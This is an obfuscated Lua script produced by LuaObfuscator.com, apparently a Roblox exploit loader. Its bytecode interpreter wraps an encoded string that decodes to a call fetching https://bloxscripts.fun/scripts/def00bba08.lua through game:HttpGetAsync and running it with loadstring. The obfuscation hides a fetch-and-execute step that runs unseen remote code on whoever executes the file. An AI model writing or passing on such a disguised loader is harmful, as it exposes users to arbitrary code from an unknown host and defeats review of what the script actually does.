--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (3==v0) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (v0==5) then v16=nil;v16=function(v19,v20,...)local v27=1;local v28;v19=v5(v4(v19,5),"..",function(v29)if (v2(v29,2)==79) then v28=v1(v4(v29,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v3(v1(v29,16));if v28 then local v108=v6(v83,v28);v28=nil;return v108;else return v83;end break;end end end end);local function v30(v31,v32,v33)if v33 then local v84=(v31/((6 -4)^(v32-(3 -2))))%((424 -(394 + 28))^(((v33-(1064 -(55 + 1008))) -(v32-1)) + (2 -1))) ;return v84-(v84%1) ;else local v85=((10 -5) -3)^(v32-(150 -(78 + 71))) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (862 -(17 + 8 + 837)) ;end end local function v34()local v47=v2(v19,v27,v27);v27=v27 + 1 ;return v47;end local function v35()local v48,v49=v2(v19,v27,v27 + 1 + 1 );v27=v27 + (1136 -(1086 + 48)) ;return (v49 * (8 + 248)) + v48 ;end local function v36()local v50=0 -0 ;local v51;local v52;local v53;local v54;while true do if (v50==(0 -(0 + 0))) then v51,v52,v53,v54=v2(v19,v27,v27 + 2 + 1 );v27=v27 + 1 + 3 ;v50=1;end if (v50==(1973 -(1924 + 48))) then return (v54 * 16777216) + (v53 * (191166 -(108906 + 16724))) + (v52 * (359 -103)) + v51 ;end end end local function v37()local v55=v36();local v56=v36();local v57=2 -1 ;local v58=(v30(v56,1800 -((2265 -1296) + 830) ,20) * (2^(224 -(42 + 150)))) + v55 ;local v59=v30(v56,3 + 18 ,24 + 7 );local v60=((v30(v56,23 + 9 )==(2 -1)) and  -((1 -0) + 0)) or 1 ;if (v59==(290 -(170 + 120))) then if (v58==0) then return v60 * 0 ;else local v100=0 -0 ;while true do if (v100==(422 -(224 + 198))) then v59=1 -0 ;v57=1093 -(459 + 634) ;break;end end end elseif (v59==(3095 -1048)) then return ((v58==(1755 -(1240 + 515))) and (v60 * ((1023 -(980 + 42))/((144 + 1366) -((2974 -1887) + (892 -(277 + 192))))))) or (v60 * NaN) ;end return v9(v60,v59-(4793 -3770) ) * (v57 + (v58/((1 + (1440 -(693 + 746)))^52))) ;end local function v38(v39)local v61;if  not v39 then v39=v36();if (v39==(0 -0)) then return "";end end v61=v4(v19,v27,(v27 + v39) -1 );v27=v27 + v39 ;local v62={};for v75=1 + 0 , #v61 do v62[v75]=v3(v2(v4(v61,v75,v75)));end return v7(v62);end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v63=0 + 0 ;local v64;local v65;local v66;local v67;local v68;local v69;local v70;local v71;while true do if ((0 + 0)==v63) then v64=1625 -(244 + 1381) ;v65=nil;v63=448 -(390 + 57) ;end if ((10 -6)==v63) then while true do if (v64==0) then local v105=0;while true do if (v105==(1538 -(893 + 645))) then v65=0;v66=nil;v105=1;end if (v105==(1532 -(636 + 895))) then v64=381 -(377 + 3) ;break;end end end if (v64==3) then v71=nil;while true do local v109=0;while true do if (v109==(1814 -(1263 + 550))) then if (v65==0) then local v112=0 + 0 ;while true do if (v112~=0) then else v66={};v67={};v112=1;end if (v112~=(1548 -(1157 + 389))) then else v65=1 + 0 ;break;end if ((1 + 0)~=v112) then else v68={};v69={v66,v67,nil,v68};v112=676 -(336 + 338) ;end end end break;end if (v109==0) then if (v65==(3 -2)) then v70=v36();v71={};for v116=2 -1 ,v70 do local v117=681 -(433 + 248) ;local v118;local v119;local v120;local v121;while true do if (v117~=(3 -1)) then else while true do if (v118~=1) then else v121=nil;while true do if (v119~=0) then else local v157=0 + 0 ;local v158;while true do if (v157==0) then v158=1737 -(223 + 1514) ;while true do if (v158~=1) then else v119=1;break;end if (0==v158) then v120=v34();v121=nil;v158=1 + 0 ;end end break;end end end if (v119==(1 + 0)) then if (v120==(2 -1)) then v121=v34()~=0 ;elseif (v120==2) then v121=v37();elseif (v120==(1117 -(1102 + 12))) then v121=v38();end v71[v116]=v121;break;end end break;end if (0==v118) then v119=0;v120=nil;v118=1;end end break;end if (v117~=0) then else v118=0 -0 ;v119=nil;v117=1 + 0 ;end if (v117==(1 + 0)) then v120=nil;v121=nil;v117=17 -(7 + 8) ;end end end v69[2 + 1 ]=v34();v65=2;end if (v65~=(9 -7)) then else local v114=0;local v115;while true do if (v114~=(1745 -(1182 + 563))) then else v115=156 -(135 + 21) ;while true do if (v115~=(1520 -(367 + 1153))) then else for v143=1079 -(625 + 453) ,v36() do local v144=0 + 0 ;local v145;local v146;local v147;while true do if (v144~=1) then else v147=nil;while true do if (v145==1) then while true do if (v146==(452 -(27 + 425))) then v147=v34();if (v30(v147,1,1)==0) then local v174=0;local v175;local v176;local v177;local v178;local v179;while true do if (v174==(0 + 0)) then v175=0;v176=nil;v174=2 -1 ;end if (v174==2) then v179=nil;while true do if (v175==0) then local v182=0 -0 ;local v183;while true do if (v182==0) then v183=0 -0 ;while true do if (v183~=(0 + 0)) then else v176=0;v177=nil;v183=3 -2 ;end if (v183==(4 -3)) then v175=4 -3 ;break;end end break;end end end if ((1 + 1)~=v175) then else while true do if (v176==(1 + 0)) then local v186=0;local v187;while true do if (0~=v186) then else v187=0 -0 ;while true do if (v187~=1) then else v176=2;break;end if (v187~=(1136 -(833 + 303))) then else local v196=0 + 0 ;while true do if (v196==0) then v179={v35(),v35(),nil,nil};if (v177==0) then local v200=0;local v201;while true do if (v200~=(0 + 0)) then else v201=0 -0 ;while true do if (v201==0) then v179[2 + 1 ]=v35();v179[4]=v35();break;end end break;end end elseif (v177==1) then v179[3]=v36();elseif (v177==(1925 -(517 + 1406))) then v179[3]=v36() -(2^(14 + 2)) ;elseif (v177~=3) then else local v210=0 -0 ;local v211;while true do if (v210==0) then v211=477 -(42 + 435) ;while true do if (v211==0) then v179[6 -3 ]=v36() -(2^16) ;v179[4]=v35();break;end end break;end end end v196=1 + 0 ;end if (1==v196) then v187=1;break;end end end end break;end end end if (v176==(857 -(566 + 289))) then local v188=0 + 0 ;local v189;while true do if (v188==(1737 -(1151 + 586))) then v189=0 + 0 ;while true do if (v189~=1) then else v176=3;break;end if (v189==(0 + 0)) then local v197=1886 -(700 + 1186) ;while true do if (v197~=0) then else if (v30(v178,1 + 0 ,1)==(1356 -(1025 + 330))) then v179[2]=v71[v179[2]];end if (v30(v178,2,2)==1) then v179[3 -0 ]=v71[v179[3]];end v197=1;end if (v197==1) then v189=1 + 0 ;break;end end end end break;end end end if (v176~=3) then else if (v30(v178,3 + 0 ,2 + 1 )~=(3 -2)) then else v179[18 -14 ]=v71[v179[4]];end v66[v143]=v179;break;end if (0~=v176) then else local v191=0;local v192;while true do if (v191==0) then v192=0;while true do if (v192==1) then v176=1;break;end if (v192==(0 + 0)) then local v198=0 + 0 ;while true do if (v198==(770 -(416 + 353))) then v192=539 -(385 + 153) ;break;end if (v198==(664 -(232 + 432))) then local v199=0;while true do if (v199~=(1560 -(483 + 1077))) then else v177=v30(v147,950 -(861 + 87) ,20 -(10 + 7) );v178=v30(v147,4,6 + 0 );v199=1;end if (v199==(1 + 0)) then v198=1;break;end end end end end end break;end end end end break;end if (1==v175) then local v184=0;local v185;while true do if (v184==(608 -(504 + 104))) then v185=0 + 0 ;while true do if (v185~=1) then else v175=2;break;end if (v185==(794 -(75 + 719))) then local v195=0;while true do if (v195==0) then v178=nil;v179=nil;v195=1 + 0 ;end if (v195~=(1992 -(426 + 1565))) then else v185=1;break;end end end end break;end end end end break;end if (v174==(1 + 0)) then v177=nil;v178=nil;v174=1354 -(485 + 867) ;end end end break;end end break;end if (v145~=(0 + 0)) then else local v169=0 + 0 ;local v170;while true do if (v169==(1098 -(402 + 696))) then v170=0;while true do if (v170~=(0 -0)) then else local v181=0 -0 ;while true do if (v181==1) then v170=1 + 0 ;break;end if (v181~=0) then else v146=0;v147=nil;v181=1655 -(1594 + 60) ;end end end if (v170~=(1 + 0)) then else v145=1 -0 ;break;end end break;end end end end break;end if (v144==0) then v145=0;v146=nil;v144=828 -(815 + 12) ;end end end for v148=1 + 0 ,v36() do v67[v148-(1852 -(461 + 1390)) ]=v42();end v115=1;end if (v115==1) then local v141=0 + 0 ;while true do if (v141==(0 + 0)) then for v160=1,v36() do v68[v160]=v36();end return v69;end end end end break;end end end v109=79 -(13 + 65) ;end end end break;end if (v64~=1) then else local v106=0 + 0 ;while true do if ((0 -0)~=v106) then else v67=nil;v68=nil;v106=1 + 0 ;end if (v106==(2 -1)) then v64=2;break;end end end if (v64==(7 -5)) then local v107=0;while true do if (v107==(0 + 0)) then v69=nil;v70=nil;v107=1;end if (v107==1) then v64=8 -5 ;break;end end end end break;end if (v63~=1) then else v66=nil;v67=nil;v63=5 -3 ;end if (v63==3) then v70=nil;v71=nil;v63=1120 -(743 + 373) ;end if (v63==2) then v68=nil;v69=nil;v63=3;end end end local function v43(v44,v45,v46)local v72=v44[1];local v73=v44[2];local v74=v44[3];return function(...)local v77=1;local v78= -1;local v79={...};local v80=v13("#",...) -1 ;local function v81()local v86=v72;local v87=v73;local v88=v74;local v89=v41;local v90={};local v91={};local v92={};for v96=0 -0 ,v80 do if (((3265 + 1257)>=(3287 -(434 + 822))) and (v96>=v88)) then v90[v96-v88 ]=v79[v96 + (1010 -(82 + (2345 -(1381 + 37)))) ];else v92[v96]=v79[v96 + (1887 -(1717 + 169)) ];end end local v93=(v80-v88) + 1 + 0 ;local v94;local v95;while true do local v97=16 -(8 + 8) ;local v98;while true do if ((v97==(36 -(21 + (65 -(41 + 9))))) or ((3577 -1572)<=386)) then v98=(147 -(64 + 83)) -0 ;while true do if (((1694 + 2649)==4343) and (v98==(4 -3))) then if ((((5809 -4174) + 1649)==(2351 + 933)) and (v95<=((331 -128) -(105 + 95)))) then if ((v95<=(1726 -(1494 + 231))) or (((4325 -(950 + 70)) -(1593 + 93))<(1964 -(218 + 883)))) then if (((2961 + 405)>(302 -(5 + 126 + 2))) and (v95==(0 + 0 + 0))) then v92[v94[5 -(2 + 1) ]]=v94[3]~=(0 + (815 -(674 + 141))) ;else v92[v94[2]]=v94[3];end elseif ((v95>(4 -(3 -1))) or ((1205 -(101 + 118 + 374))>(4893 -(40 + 448)))) then local v125=0;local v126;local v127;local v128;while true do if ((v125==(971 -(497 + 474))) or ((5755 -(527 + 1044))<2794)) then v126=0 + 0 ;v127=nil;v125=1972 -(561 + 1410) ;end if (((3500 + 218)>=(1466 + 986)) and ((1 + 0)==v125)) then v128=nil;while true do if ((v126==(1 -0)) or ((9362 -(954 + 3914))<=((1062 + 5202) -(888 + 897)))) then v92[v127 + 1 + 0 ]=v128;v92[v127]=v128[v94[1 + 3 ]];break;end if ((4267>(3401 -2370)) and (v126==(1579 -(1441 + 138)))) then local v153=1972 -(1884 + 88) ;while true do if ((((6351 -(1704 + 41)) -(1331 + 471 + 64))<=(5066 -(1055 + 471))) and (v153==0)) then v127=v94[681 -(166 + 513) ];v128=v92[v94[3 + 0 ]];v153=(868 -516) -(134 + 217) ;end if (((1867 -1029)==(1819 -981)) and (v153==(2 -1))) then v126=1 + 0 ;break;end end end end break;end end else local v129=(829 + 635) -(1158 + 306) ;local v130;local v131;local v132;local v133;local v134;while true do if ((2==v129) or ((6277 -3036)<=(6052 -2857))) then v134=nil;while true do if ((1879<=2466) and (v130==(0 -0))) then local v154=0;local v155;while true do if (((9110 -4642)>=(5344 -(44 + 1369))) and (v154==((0 + 0) -0))) then v155=0 + 0 ;while true do if ((4145>(774 + 2008)) and (v155==(1 -0))) then v130=1 + 0 ;break;end if ((v155==(698 -(403 + 295))) or ((4987 -2542)>(2971 + 1214))) then local v171=199 -(76 + 123) ;while true do if (((2702 -(56 + 146))<(2042 + 1795)) and (0==v171)) then v131=v94[2 -0 ];v132,v133=v89(v92[v131](v14(v92,v131 + (1036 -(157 + 878)) ,v94[3 -0 ])));v171=1 + 0 ;end if ((v171==1) or (3455<(2368 -1069))) then v155=1 + 0 ;break;end end end end break;end end end if (((4808 -3108)==(2625 -925)) and (v130==(4 -2))) then for v162=v131,v78 do local v163=1013 -(821 + 192) ;local v164;while true do if (((18018 -13138)>=(436 + 934)) and (v163==(0 -0))) then v164=0 -0 ;while true do if ((v164==(1004 -(492 + 417 + 95))) or ((418 + 2069)>=(6904 -(1030 + 2807)))) then v134=v134 + (2 -1) ;v92[v162]=v132[v134];break;end end break;end end end break;end if (((1047 -(335 + 711))==v130) or ((3343 + 901)<4040)) then local v156=0 + 0 ;while true do if (((2760 -((1669 -(102 + 1516)) + 217))<=(4522 -(815 + 178 + 725))) and (v156==(1629 -(104 + 1524)))) then v130=1522 -(149 + 1371) ;break;end if ((((4166 -2260) -(117 + 416))>=(2867 -1639)) and (v156==0)) then v78=(v133 + v131) -(396 -(178 + 217)) ;v134=0 -0 ;v156=612 -((535 -101) + 177) ;end end end end break;end if ((v129==(2 -1)) or ((207 + (3737 -2782))<=(1190 -(579 + 603)))) then v132=nil;v133=nil;v129=5 -3 ;end if (((216 + 169 + 423)<(7439 -4290)) and (v129==(1516 -(1363 + 153)))) then local v142=118 -(32 + 78 + 5 + 3) ;while true do if ((v142==1) or ((2208 + 1225)>((10897 -6047) -(1151 + 260)))) then v129=1 + 0 ;break;end if ((v142==(1914 -((1600 -1186) + 1500))) or ((528 + (5756 -(149 + 1478)))<653)) then v130=0 + 0 ;v131=nil;v142=1 + 0 ;end end end end end elseif ((v95<=(1574 -(398 + 1171))) or ((2725 -(1191 + 799))>(477 + 326))) then if (((3113 -(424 + 32))>(3833 -2711)) and (v95>(1378 -(431 + (1703 -760))))) then v92[v94[1 + 1 ]]();else do return;end end elseif ((v95>(13 -7)) or ((4533 -(513 + 552))<2806)) then local v135=0;local v136;local v137;local v138;while true do if (((0 + 0)==v135) or (3528<=(2823 -(106 + (837 -(320 + 504)))))) then v136=1909 -(1024 + 885) ;v137=nil;v135=1 + 0 ;end if (((1650 -(5 + 85 + 12))>=962) and (v135==(1 + (971 -(808 + 163))))) then v138=nil;while true do if (((4615 -2844)>(3432 -1776)) and (v136==(0 + 0))) then v137=0 -0 ;v138=nil;v136=1;end if (((4975 -(336 + 388))>=1430) and (v136==(4 -3))) then while true do if ((v137==0) or ((1401 -(423 + (1362 -(289 + 639))))>=(12379 -8425))) then v138=v94[2];v92[v138]=v92[v138](v14(v92,v138 + (2 -1) ,v78));break;end end break;end end break;end end else v92[v94[1034 -(764 + 268) ]]=v46[v94[2 + 1 ]];end v77=v77 + 1 ;break;end if (((4873 -(234 + 1004))<(1491 + 2499)) and (v98==0)) then v94=v86[v77];v95=v94[(1 + 1) -1 ];v98=1 + (0 -0) ;end end break;end end end end A,B=v41(v12(v81));if  not A[1] then local v99=v44[4][v77] or "?" ;error("Script error at ["   .. v99   .. "]:"   .. A[2] );else return v14(A,2,B);end end;end return v43(v42(),{},v20)(...);end;v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D65030C3O00482O74704765744173796E63032E3O00682O7470733A2O2F626C6F78736372697074732E66756E2F736372697074732F6465662O302O626130382E6C756100093O0012063O00013O001206000100023O002003000100010003001201000300046O000400014O0002000100044O00075O00022O00053O000100012O00043O00017O00093O00023O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end end end
